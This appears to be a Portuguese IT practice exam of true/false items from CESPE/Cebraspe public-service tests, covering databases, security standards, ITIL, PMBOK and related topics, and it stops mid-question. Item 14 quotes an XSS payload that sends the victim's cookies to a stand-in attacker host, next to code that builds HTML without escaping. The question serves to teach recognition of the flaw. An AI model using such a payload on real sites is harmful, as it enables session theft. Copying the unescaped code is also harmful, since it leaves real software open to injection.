Baixe o app para aproveitar ainda mais
Prévia do material em texto
Simulado Criado em: 17/02/2021 às 10:54:56 Acerca das tarefas de mineração de dados, julgue os itens a seguir. 1. [Q1487808] Utilizamos a tarefa de classificação quando queremos descobrir o valor futuro de determinado atributo. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Data Mining. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área: Controle Externo - 6º Simulado / Questão: 123 2. [Q1487810] A tarefa de associação consiste em identificar quais atributos estão relacionados dentro dos dados analisados. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Data Mining. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área: Controle Externo - 6º Simulado / Questão: 125 Segundo os conceitos de data warehouse e data mart, julgue o item a seguir. 3. [Q1487723] Um data warehouse é usado como repositório de dados centralizados para fins transacionais, gravação e operações diárias das organizações. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Data Warehouse. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área: Controle Externo - 6º Simulado / Questão: 38 Acerca dos operadores relacionais e álgebra relacional, julgue o item a seguir. 4. [Q1487720] A operação de projeção resultará em uma nova relação que contenha todas as tuplas que pertençam à primeira relação, e não pertençam à segunda. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Algoritmos. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área: Controle Externo - 6º Simulado / Questão: 35 Com relação às informações contidas no modelo conceitual precedente, julgue os próximos itens. 5. [Q1480998] Todos os serviços, independentemente do tipo de cada um deles, são tributados por todos os países. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Banco de Dados. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Gestão de Projetos / Questão: 104 Considerando a norma ISO/IEC 27005, julgue os itens a seguir, no que se refere ao alinhamento entre o processo de gestão de riscos da segurança da informação e o sistema de gestão da segurança da informação (SGSI). 6. [Q1480973] A implementação do plano de tratamento de riscos está alinhada com a fase agir do SGSI. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > ABNT NBR ISO 27000 - Sistemas de gerenciamento de segurança da informação. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Gestão de Projetos / Questão: 94 Acerca da gestão de riscos da segurança da informação, julgue os itens subsecutivos, com base na norma ISO/IEC 27005. 7. [Q1480960] Os responsáveis pela gestão de riscos na organização são os próprios donos dos ativos ou os responsáveis pelos contextos ou escopo da gestão de riscos. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > ABNT NBR ISO 27000 - Sistemas de gerenciamento de segurança da informação. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Gestão de Projetos / Questão: 89 8. [Q1480966] O processo de tratamento de riscos deve ter como entrada uma lista dos riscos classificados por prioridade de tratamento. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > ABNT NBR ISO 27000 - Sistemas de gerenciamento de segurança da informação. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Gestão de Projetos / Questão: 92 Acerca das técnicas utilizadas na análise de negócios, julgue os itens a seguir. 9. [Q1480923] A técnica análise de gaps (gap analysis) é utilizada para a análise comparativa entre o estado atual de uma organização e o estado futuro que se pretende alcançar, a fim de identificar as diferenças a serem abordadas entre os estados. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Programação. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Gestão de Projetos / Questão: 75 10. [Q1480927] O conceito essencial (ou core concept) do modelo de análise de negócios é formado por seis componentes: mudança, necessidade, solução, contexto, stakeholder e valor. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Governança e Gestão de TI. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Gestão de Projetos / Questão: 76 Julgue os itens subsequentes, referentes a processo de desenvolvimento de software, CMMI-DEV, MPS.BR, Scrum e programação ágil. 11. [Q1480896] Os modelos ágeis de desenvolvimento de software dão grande ênfase às definições de atividades e aos processos e pouca ênfase à pragmática e ao fator humano. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > CMMI e MPS-BR. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Gestão de Projetos / Questão: 67 Acerca da Lei Geral de Proteção de Dados Pessoais (LGPD) e suas alterações, julgue os itens que se seguem. 12. [Q1480785] Entre os fundamentos que disciplinam a proteção de dados pessoais no Brasil, estão o respeito à privacidade, a autodeterminação informativa e a liberdade de expressão, de informação, de comunicação e de opinião. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > ABNT NBR ISO 27000 - Sistemas de gerenciamento de segurança da informação. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Segurança da Informação e Proteção de Dados / Questão: 118 13. [Q1480789] Os dados pessoais serão eliminados após o término de seu tratamento, sendo autorizada a sua conservação para a finalidade de estudo por órgão de pesquisa, sendo garantida, sempre que possível, a anonimização desses dados. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > ABNT NBR ISO 27000 - Sistemas de gerenciamento de segurança da informação. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Segurança da Informação e Proteção de Dados / Questão: 120 Acerca de técnicas de ataque e tipos de vulnerabilidades, julgue os itens a seguir. 14. [Q1480682] Considere que uma aplicação use a seguinte informação não confiável na construção do HTML, sem validação ou escaping.(String) page += ""; "<input name='creditcard'type='TEXT' value='" + request.getParameter ("CC") + "'>";Considere, ainda, que um atacante tenha alterado o parâmetro CC no browser pelo código a seguir><script>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi? foo='+document.cookie</script>Nesse caso, o risco de segurança da aplicação é a desserialização insegura. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > HTML. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Segurança da Informação e Proteção de Dados / Questão: 69 Acerca da conteinerização de aplicações e DevOps, julgue os itens subsequentes. 15. [Q1480529] Um contêiner é definido como um sistema operacional completo, incluindo-se o kernel e um conjunto de aplicações. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Técnicas de Teste de Software. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Infraestrutura de Tecnologia da Informação (TI) / Questão: 110 16. [Q1480539] DevOps permite que os desenvolvedores aumentem a sua produtividade. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Servidor. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Infraestruturade Tecnologia da Informação (TI) / Questão: 114 Acerca de PostgreSQL, julgue os itens a seguir. 17. [Q1480500] O arquivo pg_hba.conf controla a autenticação de usuários e hosts, de acordo com a sua origem; quando o parâmetro trust é utilizado na opção auth-metod, são aceitas conexões desde que o usuário se autentique usando senha. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Postgree Sql . Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Infraestrutura de Tecnologia da Informação (TI) / Questão: 99 Com relação ao sistema gerenciador de banco de dados Oracle, julgue os próximos itens. 18. [Q1480485] Um banco de dados executado em modo de ARCHIVELOG permite que arquivos de redo log atualizem, em tempo real, banco de dados em formato active. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Oracle. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Infraestrutura de Tecnologia da Informação (TI) / Questão: 95 <?xml version="1.0" encoding="UTF-8"?> <module xmlns="urn:jboss:module:1.0" name="com.mysql"> <Resources> <Resource-root path="mysql-connector java-5.1.15.jar"/> </resources> <dependencies> <module name="javax.api"/> <module name="javax.transaction.api"/> </dependencies> </module> Tendo como referência inicial o conteúdo do arquivo de nome module.xml do JBoss, apresentado acima, julgue os itens subsequentes. 19. [Q1480465] EAP_HOME/conf é o diretório padrão dos módulos; para que seja possível pesquisar em diretórios diferentes, o novo diretório deve ser configurado na variável JBOSS_PATH. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > XML. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Infraestrutura de Tecnologia da Informação (TI) / Questão: 87 Acerca do servidor de aplicações JBoss, julgue os itens seguintes. 20. [Q1480455] O arquivo de configuração host-master.xml deve ser utilizado para configurar os detalhes necessários para o funcionamento de um servidor em formato standalone. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Beans (JavaBeans, EJB, ManagedBeans, etc). Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Infraestrutura de Tecnologia da Informação (TI) / Questão: 83 Julgue os próximos itens, a respeito de arquitetura em nuvem e virtualização. 21. [Q1480449] Considere que um provedor de serviço de infraestrutura disponibilize recursos para seus usuários, que podem fazer uso em formato multi-tenant e têm flexibilidade para aumentar e diminuir rapidamente o uso de recursos. Nessa situação, a infraestrutura tem características de uma nuvem computacional. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Computação em nuvem. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Infraestrutura de Tecnologia da Informação (TI) / Questão: 80 22. [Q1480450] O consumo compartilhado de cinco aplicações em um servidor físico que utiliza controles de um servidor de aplicações para manter a disponibilidade de cada aplicação com configurações distintas caracteriza o uso de virtualização. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Virtualização. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Infraestrutura de Tecnologia da Informação (TI) / Questão: 81 Julgue os itens seguintes, relativos a redes de computadores. 23. [Q1480412] Com o recurso multipath iSCSI, é possível configurar várias rotas entre um servidor e seus dispositivos de armazenamento, o que permite tanto equilibrar a carga de tráfego quanto prover failover. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Redes de computadores. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Infraestrutura de Tecnologia da Informação (TI) / Questão: 66 Julgue os próximos itens, a respeito do Windows Server 2016 e do RedHat Enterprise Linux 7. 24. [Q1480400] Considere que se deseje criar uma área de trabalho virtual (virtual desktop infrastructure — VDI) utilizando-se diferentes sistemas operacionais na mesma máquina física, com vistas a validar a segurança dos dados nesses sistemas operacionais e aplicativos. Nessa situação, para que se atinja o objetivo desejado, é adequado criar, por meio do Microsoft Hyper-V Server 2016, máquinas virtuais com sistemas operacionais distintos, blindadas e de inicialização segura para realizar testes contra malware e outros acessos não autorizados nas máquinas virtuais. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Ferramentas de Virtualização (Hypervisores, VMWare, Hyper-V etc.). Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Infraestrutura de Tecnologia da Informação (TI) / Questão: 59 Julgue os próximos itens, relativos a sistemas operacionais. 25. [Q1480390] Embora o processo deva estar na memória para ser executado, ele pode ser transferido temporariamente da memória principal para uma memória de retaguarda, como um disco, por exemplo, caso se faça necessário realizar um swapping devido a uma alteração nos requisitos da memória que tenha sobrecarregado a memória disponível, que precisa ser liberada. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Gerência de memória. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Infraestrutura de Tecnologia da Informação (TI) / Questão: 54 26. [Q1480391] Na alocação de memória contígua, utiliza-se a segmentação de área de memória, de modo que a paginação não seja fragmentada, ou seja, cada processo fica contido em uma única seção da memória, contígua à seção que contém o próximo processo. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Gerência de memória. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Infraestrutura de Tecnologia da Informação (TI) / Questão: 55 Julgue os seguintes itens, considerando a ITIL 4. 27. [Q1480380] Não há prática específica para gestão de riscos, sendo o gerenciamento de riscos realizado pela prática gerenciamento da segurança. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > ITIL. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Desenvolvimento de Software / Questão: 112 28. [Q1480383] Na ITIL 4, o gerenciamento de incidentes e o gerenciamento de problemas foram unidos em uma única prática que visa restaurar a operação normal do serviço o mais rapidamente possível, juntamente com a descoberta da causa raiz do problema. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > ITIL. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Desenvolvimento de Software / Questão: 114 As informações a seguir são relativas a uma mensuração de sistemas em pontos de função. I manutenção de sete páginas HTML estáticas no portal da organização, contida em um projeto de desenvolvimento II manutenção na interface, especificamente de logotipos, e mudança de botões da aplicação, que totalizam nove pontos de função transacionais impactados III criação de identidade visual para dez páginas do portal associadas à área de comunicação social da organização A seguinte tabela mostra a quantidade de itens obtida na contagem para o projeto de desenvolvimento. função complexidade quantidade consultas externas (CE) baixa 3 arquivos de interface externa (AIE) média 1 entradas externas (EE) alta 2 arquivos lógicos internos (ALI) alta 3 Tendo como referência as informações precedentes, julgue os próximos itens, de acordo com o roteiro de métricas de software do SISP (versão 2.1). 29. [Q1480363] De acordo com os dados da tabela apresentada, as funções transacionais representam 21 pontos de função.c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > HTML. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Desenvolvimento de Software / Questão: 101 Considerando as linguagens de programação Java (versão 8 ou superior) e PHP (versão 7 ou superior), julgue os próximos itens. 30. [Q1480315] Uma expressão lambda é usada principalmente para definir a implementação procedural de uma interface associativa. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Java. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Desenvolvimento de Software / Questão: 94 A respeito de OLTP e OLAP, julgue os itens a seguir. 31. [Q1480270] A operação de ROLLUP consiste em selecionar valores específicos para os atributos, que são exibidos em uma tabulação cruzada para um maior detalhamento c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > OLAP. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Desenvolvimento de Software / Questão: 86 Julgue os itens seguintes, a respeito de web services. 32. [Q1480257] Os web services estão vinculados a uma linguagem de programação específica. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Programação. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Desenvolvimento de Software / Questão: 79 33. [Q1480258] Os serviços Web SOAP, executados no protocolo SOAP, utilizam a tecnologia XML para troca de mensagens. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > REST/SOAP. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Desenvolvimento de Software / Questão: 80 No que se refere a análise de negócios, julgue os itens que se seguem. 34. [Q1480255] Elicitar requisitos não inclui somente necessidades dos usuários, mas também extrair informações que surgem de padrões organizacionais, governamentais e industriais em geral, para atender necessidades. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Redes de computadores. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Desenvolvimento de Software / Questão: 78 Com relação a ferramentas de controle de versão SVN e GIT, julgue os próximos itens. 35. [Q1480252] No SVN, o comando UPDATE é usado para copiar todas as mudanças do local de trabalho do usuário para o repositório, com um único comando. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Programação. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Desenvolvimento de Software / Questão: 76 Pessoa - nome: string - idade: int - sexo: char - endereço: varchar Tendo como referência as informações precedentes, julgue os itens a seguir, com base na orientação a objetos. 36. [Q1480244] Pessoa é considerado um nome de classe. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > PHP. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Desenvolvimento de Software / Questão: 72 Julgue os itens seguintes, a respeito de programação ágil com XP (extreme programming). 37. [Q1480228] O refactoring de código não faz parte do modelo XP, visto que a expectativa é a entrega ágil, e não deve ser considerada em tempo de projeto a recriação de código para aprimoramento. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Programação. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Desenvolvimento de Software / Questão: 63 38. [Q1480232] Grandes quantidades de horas extras são aceitáveis em médio e longo prazo, para agilizar a entrega de requisitos. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Programação. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Desenvolvimento de Software / Questão: 65 Acerca de CMMI, julgue os itens subsecutivos. 39. [Q1480223] Programas de treinamento são estabelecidos para desenvolver habilidades técnicas e conhecimentos dos membros das equipes a partir do nível 2. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > CMMI e MPS-BR. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Desenvolvimento de Software / Questão: 60 Com relação à MPS.BR, julgue os itens subsequentes. 40. [Q1480220] Auditorias de configuração devem ser executadas em caráter opcional para fins de controle, visto que não fazem parte do resultado esperado do processo de gerência de configuração. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > CMMI e MPS-BR. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Desenvolvimento de Software / Questão: 58 Julgue os itens a seguir, relativos a conceitos de modelagem dimensional. 41. [Q1479973] Em um processo de modelagem dimensional, a operação de merge/pruge agrega informações das dimensões para diminuir a tabela de fatos. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Bancos de Dados Dimensionais. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Ciência de Dados / Questão: 100 Julgue os itens a seguir, a respeito de banco de dados relacionais. 42. [Q1479935] No modelo entidade relacionamento, as entidades representam um objeto do mundo real e o relacionamento entre esses objetos. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Banco de Dados. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Ciência de Dados / Questão: 76 43. [Q1479937] O processo de normalização de dados consiste em encontrar informações que atinjam um plano de normalização com as informações constantes nas tuplas adjacentes. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Banco de Dados. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Ciência de Dados / Questão: 77 44. [Q1479940] Em um banco de dados relacional, a chave candidata a primária é formada por um ou mais atributos que identificam uma única tupla. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Banco de Dados. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Ciência de Dados / Questão: 79 45. [Q1479946] Chaves estrangeiras não podem ser nulas e cada registro na tabela deve possuir uma, e somente uma, chave estrangeira. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Banco de Dados. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Ciência de Dados / Questão: 83 Julgue os seguintes itens, a respeito de big data. 46. [Q1479931] Tratando-se de aprendizagem de máquina, o fator de confiança para as evidências varia de -1 a 1 para representar a certeza do fato. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Big Data. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Ciência de Dados / Questão: 72 No que se refere à mineração de dados, julgue os itens a seguir. 47. [Q1479924] O objetivo da etapa de pré-processamento é diminuir a quantidade de dados que serão analisados, por meio da aplicação de filtros e de eliminadores de palavras. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Data Mining. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Ciência de Dados / Questão: 67 A respeito de dados, informação, conhecimento e inteligência, julgue os próximos itens. 48. [Q1479906] A migração do armazenamento de dados para nuvem pode ser feita por meio da replicação de servidores, caso em que os dados são replicados entre um servidor local e um servidor na nuvem. c) Certo e) Errado Disciplinas/Assuntos vinculados:Tecnologia da Informação > Data Warehouse. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Ciência de Dados / Questão: 55 49. [Q1479908] Em organizações públicas e privadas, o plano de continuidade de negócio deve garantir a segurança e a integridade dos dados armazenados. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Data Warehouse. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Ciência de Dados / Questão: 57 No que diz respeito ao escritório de processos, julgue os seguintes itens. 50. [Q1479803] O escritório de processos é responsável pelo desenho, pelo desenvolvimento e pela execução de um processo. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Dados . Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Análise de Processos de Negócios / Questão: 82 Com relação à notação BPMN, julgue os itens subsequentes. 51. [Q1479791] Na representação de um fluxograma, a presença de uma seta que é proveniente de um símbolo e que aponta para outro símbolo indica que o controle do processo foi passado para o símbolo do qual provém a seta. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > BPMN - Business Process Model and Notation. Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Análise de Processos de Negócios / Questão: 73 Julgue o item a seguir, a respeito da linguagem de programação R. 52. [Q1471202] A função plot é utilizada para plotar gráficos. O comando plot(c(1,2,3), c(3,2,1)) irá plotar o gráfico a seguir: c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Programação. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Polícia Civil do Distrito Federal PCDF - DF / Agente de Polícia Civil - 17º Simulado pós-edital / Questão: 103 Julgue os itens a seguir, com base nas normas ABNT NBR ISSO/ IEC 27001:2013, 27002:2013, 27005:2011 e 15999. 53. [Q1412045] De acordo com a ISO 27002:2013, o gerenciamento seguro de chaves secretas e privadas se torna suficiente, não sendo necessário considerar a autenticidade de chaves públicas e privadas, uma vez que chaves autoassinadas já garantem o requerido nível de confiança. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > ABNT NBR ISO 27002 - Diretrizes para gestão de segurança da informação. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Prefeitura de Aracaju - SE / Auditor de Tributos Municipais - Área: Tecnologia da Informação 1º Simulado / Questão: 56 Sobre a ISO 12207, julgue os itens a seguir: 54. [Q1412037] Uma das regras fundamentais de identificação, escopo e estruturação dos processos, é que não convém que cada processo tenha uma estrutura interna definida para que possa ser executável, basta esse processo estar de acordo com um bom escopo. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Governança e Gestão de TI. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Prefeitura de Aracaju - SE / Auditor de Tributos Municipais - Área: Tecnologia da Informação 1º Simulado / Questão: 50 Sobre qualidade de software, julgue os itens a seguir: 55. [Q1412027] Pode-se ter como exemplos de métricas de controle ou de processo, Qualidade, Eficiência e Manutenibilidade. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Qualidade de Software. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Prefeitura de Aracaju - SE / Auditor de Tributos Municipais - Área: Tecnologia da Informação 1º Simulado / Questão: 45 56. [Q1411941] A respeito dos conceitos de modelagem de dados, julgue o item a seguir. O modelo conceitual representa o mais alto nível da estrutura de um banco de dados, sendo responsável por representar as relações entre as diversas áreas que serão abordadas no banco de dados. Não há necessidade de explorar detalhes sobre a implementação, sendo o foco no ponto de vista do usuário. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Modelagem de dados. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Prefeitura de Aracaju - SE / Auditor de Tributos Municipais - Área: Tecnologia da Informação 1º Simulado / Questão: 3 57. [Q1411963] A respeito dos conceitos de análise de dados, julgue o item a seguir. A análise de dados é um conjunto de procedimentos para analisar dados, técnicas para interpretar esses resultados, resumir e organizar os dados coletados para interpretação dos dados. A análise exploratória de dados consiste na elaboração de um modelo preditivo, prevendo acontecimentos futuros com base na análise dos dados atuais. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Desenvolvimento de Sistemas. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Prefeitura de Aracaju - SE / Auditor de Tributos Municipais - Área: Tecnologia da Informação 1º Simulado / Questão: 8 58. [Q1411974] Segundo a Instrução Normativa n. 1, de 4 de abril de 2019, a Equipe de Fiscalização é composta por Fiscal Requisitante, Fiscal Técnico e Fiscal Administrativo. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Normativos sobre Governança Digital no Setor Público. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Prefeitura de Aracaju - SE / Auditor de Tributos Municipais - Área: Tecnologia da Informação 1º Simulado / Questão: 14 59. [Q1411997] Os silos organizacionais são um dos maiores desafios que uma organização pode enfrentar ao tentar trabalhar de forma eficaz e eficiente com uma visão compartilhada, ou tornar- se mais ágil e resiliente. O SVS é utilizado pela ITIL 4 como solução para os silos, descrevendo como todos os componentes e atividades da organização trabalham juntos como um sistema para habilitar a criação de valor. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > ITIL. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Prefeitura de Aracaju - SE / Auditor de Tributos Municipais - Área: Tecnologia da Informação 1º Simulado / Questão: 24 60. [Q1412002] O Cobit 2019 manteve os mesmos princípios para criação de valor, que são: Realização de benefícios, Otimização de recursos e Gestão de riscos. Porém, devido à importância no uso de informações e tecnologia, fez questão de diferenciar o conceito de I&T e TI, da seguinte forma: TI: usado pela área organizacional, responsável pela tecnologia; I&T: todas as informações que a organização cria, processa e utiliza para atingir seus objetivos, fazendo uso da tecnologia para suportar. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > COBIT. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Prefeitura de Aracaju - SE / Auditor de Tributos Municipais - Área: Tecnologia da Informação 1º Simulado / Questão: 27 61. [Q1412012] Dentre as áreas de conhecimento do gerenciamento de projetos, de acordo com o PMBOK 6, destaca-se a de Integração. O gerenciamento da integração do projeto inclui os processos e atividades para identificar, definir, combinar, unificar e coordenar os vários processos e atividades de gerenciamento de projeto dentro dos Grupos de Processos de Gerenciamento do Projeto. No contexto de gerenciamento de projetos, a integração inclui características de unificação, consolidação, comunicação e inter-relacionamentos. Estas ações devem ser aplicadas desde o início do projeto até a sua conclusão. O Gerenciamento da Integração do Projeto inclui fazer escolhas sobre: identificação das partes interessadas; coleta de seus requisitos; controle do escopo e do tempo do projeto. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Engenharia de Software. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Prefeitura de Aracaju - SE / Auditor de Tributos Municipais - Área: Tecnologia da Informação 1º Simulado / Questão: 33 62. [Q1412017] De acordo com o PMBOK 6, as ferramentas do processo de Planejaro Gerenciamento dos Custos do projeto são Opinião especializada, análise de dados, reuniões e estimativas de três pontos. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > PMBOK. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Prefeitura de Aracaju - SE / Auditor de Tributos Municipais - Área: Tecnologia da Informação 1º Simulado / Questão: 36 63. [Q1412020] O Gerenciamento das Comunicações do Projeto inclui os processos necessários para garantir que as necessidades de informações do projeto e de suas partes interessadas sejam satisfeitas, com o desenvolvimento de artefatos e a implementação de atividades projetadas para realizar a troca eficaz de informações. Como parte do processo de comunicação, o emissor é responsável por transmitir a mensagem, assegurando que as informações comunicadas estão claras e completas e confirmando que a mensagem foi interpretada corretamente. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Gestão de Projetos. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Prefeitura de Aracaju - SE / Auditor de Tributos Municipais - Área: Tecnologia da Informação 1º Simulado / Questão: 39 64. [Q1412021] De acordo com o PMBOK 6, as ferramentas do processo de Planejar o Gerenciamento dos Riscos são: Opinião especializada, Análise de dados, que aborda a análise das partes interessadas, e reuniões. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > PMBOK. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Prefeitura de Aracaju - SE / Auditor de Tributos Municipais - Área: Tecnologia da Informação 1º Simulado / Questão: 40 65. [Q1402226] A modelagem dimensional é uma técnica de projeto lógico que é usualmente usada em bancos orientados a objetos. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Programação. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas da União TCU - BR / Auditor Federal de Controle Externo - 4º Simulado / Questão: 99 Julgue os próximos itens, relativos à gestão de segurança da informação. 66. [Q1383943] A preparação de um plano de continuidade de negócios pode afetar o propósito da gestão de 